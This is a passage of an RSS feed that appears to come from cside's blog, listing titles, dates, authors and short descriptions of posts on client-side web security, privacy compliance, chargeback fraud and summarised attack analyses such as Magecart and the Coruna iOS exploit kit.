steps.</description><pubDate>Wed, 18 Mar 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/03/blog_cover_blue--1-.png" length="0" type="image/png"/></item><item><title>OpenClaw Scanner for Third-Party Scripts</title><link>https://cside.com/blog/openclaw-scanner-for-third-party-scripts</link><guid isPermaLink="true">https://cside.com/blog/openclaw-scanner-for-third-party-scripts</guid><description>A free, open-source scanner that inventories third-party scripts, detects fingerprinting, audits security headers and cookies, and flags PCI DSS exposure on payment pages. Run a quick 30-second audit to reveal what code executes in your users&apos; browsers.</description><pubDate>Wed, 18 Mar 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/03/Free-Website-Scanner--Third-Party-Script-Security-.webp" length="0" type="image/webp"/></item><item><title>Inside Coruna - Web Script IOS Exploit</title><link>https://cside.com/blog/inside-coruna-web-script-ios-exploit</link><guid isPermaLink="true">https://cside.com/blog/inside-coruna-web-script-ios-exploit</guid><description>Your website could have been used to distribute this iOS exploit kit and you wouldn&apos;t have known. A full technical breakdown of Coruna: five exploit chains, 23 CVEs, and the delivery infrastructure that makes every website a potential attack vector.</description><pubDate>Sun, 08 Mar 2026 00:00:00 GMT</pubDate><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/03/coruna_feature_v5.png" length="0" type="image/png"/></item><item><title>&quot;Microsoft Clairty&quot; Isn&apos;t Microsoft Clarity: Deobfuscating a Typosquatted Ad Fraud Script</title><link>https://cside.com/blog/microsoft-clairty-isnt-microsoft-clarity-deobfuscating-a-typosquatted-ad-fraud-script</link><guid isPermaLink="true">https://cside.com/blog/microsoft-clairty-isnt-microsoft-clarity-deobfuscating-a-typosquatted-ad-fraud-script</guid><description>cside observed a new malicious client-side injection originating from a malicious browser extension impersonating Microsoft Clarity and overwriting referral tokens to redirect referral revenue to a malicious actor.</description><pubDate>Tue, 03 Mar 2026 00:00:00 GMT</pubDate><category>Attacks</category><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/03/Threat-Discovery---msclairty.com---cside---march-3-2026---Blog.webp" length="0" type="image/webp"/></item><item><title>How to Block and Detect AI Agents on Your Website: 4 Methods Compared</title><link>https://cside.com/blog/how-to-block-ai-agents-on-your-website-guide</link><guid isPermaLink="true">https://cside.com/blog/how-to-block-ai-agents-on-your-website-guide</guid><description>Compare 4 approaches to blocking and detecting AI agents: robots.txt, server controls, traditional bot detection, and specialized AI agent detection. Find out which ones actually stop fraud.</description><pubDate>Tue, 24 Feb 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/02/How-to-Block-AI-Agents--On-Your-Website---cside.webp" length="0" type="image/webp"/></item><item><title>How to Monitor Cross Border Data Transfer On Your Website | GDPR, CCPA</title><link>https://cside.com/blog/how-to-monitor-cross-border-data-transfer-on-your-website</link><guid isPermaLink="true">https://cside.com/blog/how-to-monitor-cross-border-data-transfer-on-your-website</guid><description>Your website is likely sending personal data to other countries. Learn how to track cross-border data transfers for GDPR and CCPA requirements.</description><pubDate>Thu, 12 Feb 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/02/How-to-Monitor---Cross-Border-Data-Transfer---cside.webp" length="0" type="image/webp"/></item><item><title>How to Prevent Website Data Breaches (to avoid GDPR &amp; CCPA fines)</title><link>https://cside.com/blog/how-to-prevent-website-data-breaches-gdpr-ccpa</link><guid isPermaLink="true">https://cside.com/blog/how-to-prevent-website-data-breaches-gdpr-ccpa</guid><description>1/3rd of breaches involve third parties. Learn how to prevent GDPR and CCPA violations by securing third-party scripts, APIs, and data flows.</description><pubDate>Fri, 06 Feb 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/02/How-to-prevent-website-data-breaches-to-avoid-GDPR-and-CCPA-penalties--1-.webp" length="0" type="image/webp"/></item><item><title>GDPR Tools 2026: 6 Categories and the Software for Each</title><link>https://cside.com/blog/comparing-tools-for-gdpr-compliance-2026-selection-guide</link><guid isPermaLink="true">https://cside.com/blog/comparing-tools-for-gdpr-compliance-2026-selection-guide</guid><description>No single platform covers GDPR compliance alone. The 6 tool types: consent management, client-side monitoring, DSAR, data mapping, security, and automation.</description><pubDate>Tue, 03 Feb 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/content/images/2026/02/Top-tools-for-gdpr-compliance-blog-cover-image-cside.webp" length="0" type="image/webp"/></item><item><title>E-Skimming: How the Attack Works and How to Prevent It (2026)</title><link>https://cside.com/blog/what-is-e-skimming-guide-and-prevention-tips</link><guid isPermaLink="true">https://cside.com/blog/what-is-e-skimming-guide-and-prevention-tips</guid><description>E-skimming injects code on checkout pages to steal payment data before encryption. How the attack works and what PCI DSS 4.0.1 §6.4.3 requires.</description><pubDate>Thu, 29 Jan 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/content/images/2026/01/What-is-web-skimming---Guide-and-prevention-tips.webp" length="0" type="image/webp"/></item><item><title>VCDPA: Guide to Requirements + Website Compliance</title><link>https://cside.com/blog/vcdpa-guide-to-requirements-website-compliance</link><guid isPermaLink="true">https://cside.com/blog/vcdpa-guide-to-requirements-website-compliance</guid><description>Get a clear breakdown of Virginia Consumer Data Protection Act rules, enforcement timelines, and how to manage third-party scripts correctly.</description><pubDate>Thu, 22 Jan 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/01/VCDPA---Virginia-Consumer-Data-Protection-Act---Requirements-and-Website-Compliance.webp" length="0" type="image/webp"/></item><item><title>Third-party script security: best practices for securing third-party scripts on web pages</title><link>https://cside.com/blog/best-practices-for-securing-third-party-scripts</link><guid isPermaLink="true">https://cside.com/blog/best-practices-for-securing-third-party-scripts</guid><description>Third-party script security best practices to stop Magecart: script inventory, least-privilege access, integrity checks, and runtime monitoring.</description><pubDate>Wed, 21 Jan 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/01/Best-Practices-to-Secure-Third-Party-Scripts.webp" length="0" type="image/webp"/></item><item><title>Best Client-Side Security Tools for Compliance Reporting &amp; Audits (2026)</title><link>https://cside.com/blog/top-client-side-security-tools-full-guide</link><guid isPermaLink="true">https://cside.com/blog/top-client-side-security-tools-full-guide</guid><description>Compare the best client-side security tools for compliance reporting and audits in 2026, ranked by audit evidence, session coverage, and pricing.</description><pubDate>Tue, 20 Jan 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/01/Comparing-client-side-security-tools-selection-guide.webp" length="0" type="image/webp"/></item><item><title>CPA (Colorado Privacy Act): Guide to Requirements + Website Compliance</title><link>https://cside.com/blog/cpa-colorado-privacy-act-guide-to-requirements-website-compliance</link><guid isPermaLink="true">https://cside.com/blog/cpa-colorado-privacy-act-guide-to-requirements-website-compliance</guid><description>Get a clear breakdown of Colorado Privacy Act rules, enforcement timelines, and how to manage third-party scripts correctly.</description><pubDate>Fri, 16 Jan 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/content/images/2026/01/CPA---Colorado-Privacy-Act---Requirements-and-Website-Compliance.webp" length="0" type="image/webp"/></item><item><title>How to detect VPN traffic on your website</title><link>https://cside.com/blog/how-to-detect-vpn-traffic-on-your-website</link><guid isPermaLink="true">https://cside.com/blog/how-to-detect-vpn-traffic-on-your-website</guid><description>VPN detection in five signals: IP block ownership, JA4 TLS fingerprint, timezone drift, WebRTC, and behavior. IP lists alone miss residential VPNs.</description><pubDate>Wed, 14 Jan 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/01/How-to-Detect-VPN-Traffic-On-Your-Website.png" length="0" type="image/png"/></item><item><title>Top AI Tools For Website Privacy Compliance in 2026 (GDPR, CPRA)</title><link>https://cside.com/blog/best-ai-tools-for-website-privacy-compliance</link><guid isPermaLink="true">https://cside.com/blog/best-ai-tools-for-website-privacy-compliance</guid><description>Website privacy compliance is getting harder. Fortunately these AI-powered tools automate the heavy lifting across GDPR, CCPA, and HIPAA.</description><pubDate>Tue, 13 Jan 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/content/images/2026/01/best-ai-tools-for-website-privacy-compliance-gdpr-cpra-hipaa.webp" length="0" type="image/webp"/></item><item><title>2026 Web Security Predictions from cside&apos;s CEO</title><link>https://cside.com/blog/2026-web-security-predictions</link><guid isPermaLink="true">https://cside.com/blog/2026-web-security-predictions</guid><description>2026 will look different from past years. We&apos;ll be watching for: deepfake-powered phishing, LLM hallucinated security recommendations, and AI agent attackers.</description><pubDate>Thu, 08 Jan 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2026/01/web-security-predictions-2026.webp" length="0" type="image/webp"/></item><item><title>Does GDPR apply to my U.S. company? (3 step self assessment)</title><link>https://cside.com/blog/does-gdpr-apply-to-my-u-s-company-3-step-self-assessment</link><guid isPermaLink="true">https://cside.com/blog/does-gdpr-apply-to-my-u-s-company-3-step-self-assessment</guid><description>GDPR might apply to your website even if you&apos;re U.S. based. Use this 3 step checklist to see if you&apos;re at risk and the potential for financial penalties.</description><pubDate>Thu, 08 Jan 2026 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2026/01/Does-gdpr-apply-to-u-s-companies-self-assessment.webp" length="0" type="image/webp"/></item><item><title>10 common GDPR website compliance failures (and how to prevent them)</title><link>https://cside.com/blog/common-gdpr-compliance-failures-and-prevention</link><guid isPermaLink="true">https://cside.com/blog/common-gdpr-compliance-failures-and-prevention</guid><description>Common GDPR website compliance failures, why your team doesn&apos;t notice them on your website, and how to prevent unlawful data collection.</description><pubDate>Tue, 30 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/content/images/2025/12/Common-gdpr-failures-and-how-to-prevent-them.webp" length="0" type="image/webp"/></item><item><title>Best client-side security for eCommerce?</title><link>https://cside.com/blog/best-client-side-security-for-ecommerce</link><guid isPermaLink="true">https://cside.com/blog/best-client-side-security-for-ecommerce</guid><description>eCommerce sites are heavy consumers of client-side tracking tags which creates a significant risk for malicious exfiltration of sensitive data but also legitimate tags collecting more data than is necessary to sell to data brokers. The cside solution solves these concerns with ease.</description><pubDate>Fri, 26 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/Financial-Institutions--1-.webp" length="0" type="image/webp"/></item><item><title>GDPR Penalties for Websites: How to Avoid Fines in 2026</title><link>https://cside.com/blog/gdpr-penalties-explained</link><guid isPermaLink="true">https://cside.com/blog/gdpr-penalties-explained</guid><description>Third-party scripts are a fast-growing GDPR enforcement trigger. See fine categories, real enforcement cases, and how to avoid website liability.</description><pubDate>Fri, 26 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/content/images/2025/12/What-Are-The-Fines-For-GDPR-Explained.webp" length="0" type="image/webp"/></item><item><title>Best client-side security for Financial Institutions?</title><link>https://cside.com/blog/best-client-side-security-for-financial-institutions</link><guid isPermaLink="true">https://cside.com/blog/best-client-side-security-for-financial-institutions</guid><description>Nation-state targets like Financial Institutions need to partner with vendors that understand limitations and work to get as close to full coverage as is possible. Read why many choose cside&apos;s multi-layer model.</description><pubDate>Wed, 24 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/Financial-Institutions.webp" length="0" type="image/webp"/></item><item><title>How to comply with GDPR website requirements (2026 guide)</title><link>https://cside.com/blog/how-to-comply-with-gdpr-website-requirements-2026</link><guid isPermaLink="true">https://cside.com/blog/how-to-comply-with-gdpr-website-requirements-2026</guid><description>Reducing GDPR risk starts with knowing what embedded third-party scripts collect. The six control areas regulators check, explained for 2026.</description><pubDate>Wed, 24 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/content/images/2025/12/GDPR---How-to-Comply-with-GDPR---Website-Requirements.webp" length="0" type="image/webp"/></item><item><title>CSS Security: Protecting Against CSS-Based Attacks</title><link>https://cside.com/blog/what-is-css-security-preventing-phishing-clickjacking-from-css-attacks</link><guid isPermaLink="true">https://cside.com/blog/what-is-css-security-preventing-phishing-clickjacking-from-css-attacks</guid><description>CSS controls what your users see. This guide covers CSS-based attack vectors, from clickjacking to input manipulation, and how to stop them.</description><pubDate>Tue, 23 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/content/images/2025/12/what-is-css-security.webp" length="0" type="image/webp"/></item><item><title>TDPSA: Guide to Requirements + Website Compliance</title><link>https://cside.com/blog/tdpsa-guide-to-requirements-website-compliance</link><guid isPermaLink="true">https://cside.com/blog/tdpsa-guide-to-requirements-website-compliance</guid><description>Get a clear breakdown of Texas Data Privacy and Security Act rules, enforcement timelines, and how to manage third-party scripts correctly.</description><pubDate>Thu, 18 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/12/TDPSA---Texas-Data-Privacy-and-Security-Act---Requirements-and-Website-Compliance.webp" length="0" type="image/webp"/></item><item><title>The British Airways Attack of 2018 - The Deeper Story</title><link>https://cside.com/blog/the-british-airways-attack-of-2018-full-breakdown</link><guid isPermaLink="true">https://cside.com/blog/the-british-airways-attack-of-2018-full-breakdown</guid><description>The 2018 British Airways attack affected 429,612 individuals. See why cside bought the attacker domain to turn it into a lesson on modern web security.</description><pubDate>Mon, 15 Dec 2025 00:00:00 GMT</pubDate><category>Attacks</category><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/The-British-Airways-Attack-of-2018---Full-Attack-Breakdown---cside.webp" length="0" type="image/webp"/></item><item><title>How cside brought AI to Client-Side Security</title><link>https://cside.com/blog/how-cside-pioneers-ai-in-client-side-security</link><guid isPermaLink="true">https://cside.com/blog/how-cside-pioneers-ai-in-client-side-security</guid><description>In 2024, cside launched the first client-side security solution with integrated AI for JavaScript security analysis and compliance automation.</description><pubDate>Sun, 14 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/cside-first-platform-to-integrate-ai-into-client-side-security.webp" length="0" type="image/webp"/></item><item><title>Addressing Incorrect Claims Made by Reflectiz About cside</title><link>https://cside.com/blog/incorrect-claims-made-by-reflectiz-about-cside</link><guid isPermaLink="true">https://cside.com/blog/incorrect-claims-made-by-reflectiz-about-cside</guid><description>Learn why Reflectiz’s scanner-based claims about cside are incorrect and how cside’s real-time client-side security provides deeper protection, full payload forensics, and PCI DSS 4.0.1 compliance.</description><pubDate>Mon, 08 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/addressing-incorrect-claims.png" length="0" type="image/png"/></item><item><title>Magecart Protection: How Attacks Work and How to Stop Them</title><link>https://cside.com/blog/magecart-attacks-guide-and-prevention-steps</link><guid isPermaLink="true">https://cside.com/blog/magecart-attacks-guide-and-prevention-steps</guid><description>Magecart steals card numbers from checkout pages while WAFs see nothing. Learn how it works, detection signs, and protection controls for 2026.</description><pubDate>Tue, 02 Dec 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/12/What-is-Magecart---Complete-Guide-and-Automated-Prevention.webp" length="0" type="image/webp"/></item><item><title>Script Integrity Management for e-commerce Brands (SRI, Dynamic Scripts)</title><link>https://cside.com/blog/script-integrity-management-for-e-commerce-brands-sri-dynamic-scripts</link><guid isPermaLink="true">https://cside.com/blog/script-integrity-management-for-e-commerce-brands-sri-dynamic-scripts</guid><description>Deep dive into script integrity vs Subresource Integrity vs behavioral monitoring for PCI DSS 6.4.3, 11.6.1, ISO 27001, and HIPAA compliance.</description><pubDate>Wed, 26 Nov 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/11/Verify-Script-Integrity-for-Compliance-Article.webp" length="0" type="image/webp"/></item><item><title>CTDPA: Guide to Requirements + Third-Party Script Compliance</title><link>https://cside.com/blog/ctdpa-guide-to-requirements-third-party-script-compliance</link><guid isPermaLink="true">https://cside.com/blog/ctdpa-guide-to-requirements-third-party-script-compliance</guid><description>Get a clear breakdown of Connecticut Data Privacy Act rules, enforcement timelines, and how to manage third-party scripts correctly.</description><pubDate>Tue, 25 Nov 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/11/Featured-Image-CTDPA---Connecticut-Data-Privacy-Act.png" length="0" type="image/png"/></item><item><title>Expired Domain Risks: A Real Example from Oracle&apos;s Website</title><link>https://cside.com/blog/expired-domain-risks-a-real-example-from-oracles-website</link><guid isPermaLink="true">https://cside.com/blog/expired-domain-risks-a-real-example-from-oracles-website</guid><description>An expired domain reference is all an attacker needs to execute phishing under a trusted origin. This blog looks at an example from Oracle&apos;s code.</description><pubDate>Tue, 25 Nov 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/11/Featured-Image-Oracle-Expired-Domain.png" length="0" type="image/png"/></item><item><title>How WebView mobile apps are dangerous for banking</title><link>https://cside.com/blog/webview-mobile-apps-client-side-attacks</link><guid isPermaLink="true">https://cside.com/blog/webview-mobile-apps-client-side-attacks</guid><description>Banking &quot;apps&quot; that run on browser environments expose credentials without teams realizing it. This article explores examples of WebView mobile app attacks.</description><pubDate>Fri, 21 Nov 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/11/Featured-Image-How-WebView-Mobile-Apps-are-Dangerous-for-Banking.png" length="0" type="image/png"/></item><item><title>Shady Plugins in WooCommerce: Security Risks &amp; Protection Tips</title><link>https://cside.com/blog/shady-plugins-in-woocommerce-security-risks-protection-tips</link><guid isPermaLink="true">https://cside.com/blog/shady-plugins-in-woocommerce-security-risks-protection-tips</guid><description>Your checkout is only as safe as your plugins. Discover how WooCommerce handles plugin HTML, why that matters, and the steps to stop malicious code.</description><pubDate>Wed, 19 Nov 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/11/shady-plugins-woocommerce-defense-tips-featured-image.png" length="0" type="image/png"/></item><item><title>Merchant Chargeback Prevention: The 2026 Playbook</title><link>https://cside.com/blog/merchant-chargeback-prevention</link><guid isPermaLink="true">https://cside.com/blog/merchant-chargeback-prevention</guid><description>Still have a chargeback stack built for the pre-VAMP era? Here&apos;s how leading fraud teams use early dispute blocking to stay ahead of tighter rules in 2026.</description><pubDate>Sat, 08 Nov 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/12/How-Merchants-Can-Prevent-Chargebacks--1-.webp" length="0" type="image/webp"/></item><item><title>Device Fingerprinting in CE 3.0 | How to Block More Chargeback Disputes</title><link>https://cside.com/blog/device-fingerprinting-for-compelling-evidence-chargebacks</link><guid isPermaLink="true">https://cside.com/blog/device-fingerprinting-for-compelling-evidence-chargebacks</guid><description>This is how merchants use device fingerprinting to win more Compelling Evidence cases (VISA). It blocks first-party fraud and lowers VAMP ratios.</description><pubDate>Tue, 21 Oct 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/12/Device-Fingerprinting-to-Fight-Chargeback-Fraud--1-.webp" length="0" type="image/webp"/></item><item><title>Why Chargeback Indemnification No Longer Works With the New VAMP Ratio</title><link>https://cside.com/blog/why-chargeback-indemnification-no-longer-works-with-the-new-vamp-ratio</link><guid isPermaLink="true">https://cside.com/blog/why-chargeback-indemnification-no-longer-works-with-the-new-vamp-ratio</guid><description>Chargeback indemnification won&apos;t shield you under the 2026 VAMP rules. Penalties and terminations still hit. Here&apos;s how to adapt.</description><pubDate>Thu, 09 Oct 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/content/images/2025/12/Why-Chargeback-Indemnification-Does-Not-Work-With-New-VAMP-Rules.webp" length="0" type="image/webp"/></item><item><title>Client-Side Security: How to Monitor Every Browser Script</title><link>https://cside.com/blog/what-is-client-side-security</link><guid isPermaLink="true">https://cside.com/blog/what-is-client-side-security</guid><description>Client-side security monitors the scripts running in your users&apos; browsers, detecting Magecart skimming and data exfiltration that your WAF and server never see.</description><pubDate>Thu, 02 Oct 2025 00:00:00 GMT</pubDate><category>Blog</category><category>Attacks</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/What-is-Client-Side-Security--1-.webp" length="0" type="image/webp"/></item><item><title>Mockito docs hijacked</title><link>https://cside.com/blog/mockito-docs-hijacked</link><guid isPermaLink="true">https://cside.com/blog/mockito-docs-hijacked</guid><description>Some attacks are stupidly low tech. Mockito, a popular open source package contained a malicious link in their Github Docs.</description><pubDate>Tue, 30 Sep 2025 00:00:00 GMT</pubDate><category>Attacks</category><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/Mockito-Docs-Hijacked.webp" length="0" type="image/webp"/></item><item><title>Vibe Coding Security Risks: Client-Side Exposures in AI Platforms (Lovable, Copilot, Cursor &amp; more)</title><link>https://cside.com/blog/vibe-coding-security-risks-ai-platforms</link><guid isPermaLink="true">https://cside.com/blog/vibe-coding-security-risks-ai-platforms</guid><description>Understand the common vulnerabilities in code made with AI coding platforms like Lovable, Copilot, Cursor, + Replit. See how to fix them before you ship them.</description><pubDate>Tue, 30 Sep 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/vibe-coding-security-risks-lovable-cursor-ai-platforms.webp" length="0" type="image/webp"/></item><item><title>Chargebacks911 and cside Partner to Fight Chargeback Fraud</title><link>https://cside.com/blog/chargebacks911-and-cside-partner-to-fight-chargeback-fraud-2</link><guid isPermaLink="true">https://cside.com/blog/chargebacks911-and-cside-partner-to-fight-chargeback-fraud-2</guid><description>We&apos;re excited to reveal our partnership with Chargebacks911. Merging CB911&apos;s expertise with cside&apos;s client-side intelligence helps merchants fight friendly fraud and win more chargeback disputes.</description><pubDate>Tue, 09 Sep 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/12/image-cside-partners-with-chargebacks911--2-.webp" length="0" type="image/webp"/></item><item><title>cside Joins AWS Partner Network and ISV Accelerate</title><link>https://cside.com/blog/cside-aws-partner-network</link><guid isPermaLink="true">https://cside.com/blog/cside-aws-partner-network</guid><description>Working alongside AWS helps us bring our solution to the cloud environment our customers already rely on. For us, this is a step towards making client-side security widely accessible.</description><pubDate>Tue, 09 Sep 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Juan Combariza</author><enclosure url="https://cside.com/content/images/2025/12/cside-aws-partnership.webp" length="0" type="image/webp"/></item><item><title>QSA Assessment Checklist for Client-Side PCI Requirements</title><link>https://cside.com/blog/qsa-guide-for-6-4-3-and-11-6-1</link><guid isPermaLink="true">https://cside.com/blog/qsa-guide-for-6-4-3-and-11-6-1</guid><description>We put together a shorthand checklist, red flags to look for, and the compliance differences between CSP, Crawlers, and Client-side scripts.</description><pubDate>Tue, 09 Sep 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/cover-of-this-article-in-black-and-blue-background-converted-from-png.webp" length="0" type="image/webp"/></item><item><title>The Blockchain Is Not Your Friend: Examining EtherHiding and using Blockchain for Attacks</title><link>https://cside.com/blog/examining-etherhiding-and-blockchain-for-attacks</link><guid isPermaLink="true">https://cside.com/blog/examining-etherhiding-and-blockchain-for-attacks</guid><description>In March/April of 2025 a ClickFix variant was going around that used the Binance blockchain with smart contracts to control malware payloads that would surface from a hacked WordPress plugin.</description><pubDate>Tue, 02 Sep 2025 00:00:00 GMT</pubDate><category>Attacks</category><category>Blog</category><author>Jack LaFond</author><enclosure url="https://cside.com/content/images/2025/12/Examining-EtherHiding-and-Blockchain-for-attacks.webp" length="0" type="image/webp"/></item><item><title>Deobfuscating Third-Party JavaScript Code | A Security Engineer&apos;s Guide</title><link>https://cside.com/blog/how-to-deobfuscate-third-party-javascript-code</link><guid isPermaLink="true">https://cside.com/blog/how-to-deobfuscate-third-party-javascript-code</guid><description>From a security perspective, a third-party script with obfuscated code is a massive red flag. This guide explores methods to deobfuscate JavaScript and how to spot common attacks.</description><pubDate>Thu, 28 Aug 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Jack LaFond</author><enclosure url="https://cside.com/content/images/2025/12/cover-image---cside-guide-to-analyzing-and-deobfuscating-third-party-javascript--1-.webp" length="0" type="image/webp"/></item><item><title>How to comply with PCI 6.4.3 and 11.6.1 | Practical guide for security teams</title><link>https://cside.com/blog/how-to-comply-with-pci-6-4-3</link><guid isPermaLink="true">https://cside.com/blog/how-to-comply-with-pci-6-4-3</guid><description>A practical guide to PCI 6.4.3 for security teams in eCommerce, FinTech, and SaaS. Learn why CSP or Crawlers are not enough to protect your users.</description><pubDate>Tue, 19 Aug 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Mike Kutlu</author><enclosure url="https://cside.com/content/images/2025/12/blog-cover-how-to-comply-with-pci-643-and-pci-11-6-1.webp" length="0" type="image/webp"/></item><item><title>Cosmic Ray Bit Flips and the Hidden Risk at Scale</title><link>https://cside.com/blog/cosmic-ray-bit-flips-and-the-hidden-risk-at-scale</link><guid isPermaLink="true">https://cside.com/blog/cosmic-ray-bit-flips-and-the-hidden-risk-at-scale</guid><description>When a 1 in a million rare occurrence, turns out not to be so rare. How our atmosphere changes zero to ones and how it can impact security.</description><pubDate>Fri, 08 Aug 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Jack LaFond</author><enclosure url="https://cside.com/content/images/2025/12/blog-cover-cosmic-ray-bit-flips.webp" length="0" type="image/webp"/></item><item><title>Client-Side Attack Report Q2 2025</title><link>https://cside.com/blog/client-side-attack-report-q2-2025</link><guid isPermaLink="true">https://cside.com/blog/client-side-attack-report-q2-2025</guid><description>Q2 2025: cside tracked 72,740 compromised sites. Chinese PWA scams, Google OAuth abuse, a CoinMarketCap wallet drainer, ClickFix and SEO poisoning.</description><pubDate>Wed, 30 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/image-client-side-attack-report-q2-2025.webp" length="0" type="image/webp"/></item><item><title>The PII Blind Spot in Web Security</title><link>https://cside.com/blog/the-pii-blind-spot-in-web-security</link><guid isPermaLink="true">https://cside.com/blog/the-pii-blind-spot-in-web-security</guid><description>But PII moves through the frontend, where controls are weaker and visibility is often limited.</description><pubDate>Wed, 30 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/blog-cover-the-pii-blind-spot.webp" length="0" type="image/webp"/></item><item><title>UK Internet Age Verification System explained for cyber security</title><link>https://cside.com/blog/uk-internet-age-verification-system-explained-for-cyber-security</link><guid isPermaLink="true">https://cside.com/blog/uk-internet-age-verification-system-explained-for-cyber-security</guid><description>The goal of the UK Internet Age Verification System is to protect children browsing on the internet. But these checks come with new cybersecurity risks and privacy concerns.</description><pubDate>Tue, 29 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/UK-Internet-Age-Verification-Blog-Banner.webp" length="0" type="image/webp"/></item><item><title>cside at PCI SSC 2025 North America Community Meeting</title><link>https://cside.com/blog/cside-at-pci-ssc-2025-north-america-community-meeting</link><guid isPermaLink="true">https://cside.com/blog/cside-at-pci-ssc-2025-north-america-community-meeting</guid><description>We are in town for the PCI SSC 2025 North America Community Meeting, September 16th to 18th.</description><pubDate>Thu, 24 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/07/Frame-289155.jpg" length="0" type="image/jpeg"/></item><item><title>How Chrome extensions can remove security headers</title><link>https://cside.com/blog/how-chrome-extensions-can-remove-security-headers</link><guid isPermaLink="true">https://cside.com/blog/how-chrome-extensions-can-remove-security-headers</guid><description>Many browsers actively update extensions without specific approval or opt-in. This means that an extension today can behave wildly differently tomorrow, and you will not be made aware of it.</description><pubDate>Mon, 21 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Simon Wijckmans</author><enclosure url="https://cside.com/content/images/2025/12/title-of-this-article-on-black-and-blue-background.webp" length="0" type="image/webp"/></item><item><title>CryptoJacking is dead: long live CryptoJacking</title><link>https://cside.com/blog/cryptojacking-is-dead-long-live-cryptojacking</link><guid isPermaLink="true">https://cside.com/blog/cryptojacking-is-dead-long-live-cryptojacking</guid><description>Modern crypto jacking has evolved into a silent, multi-stage attacks.</description><pubDate>Thu, 17 Jul 2025 00:00:00 GMT</pubDate><category>Blog</category><author>Himanshu Anand</author><enclosure 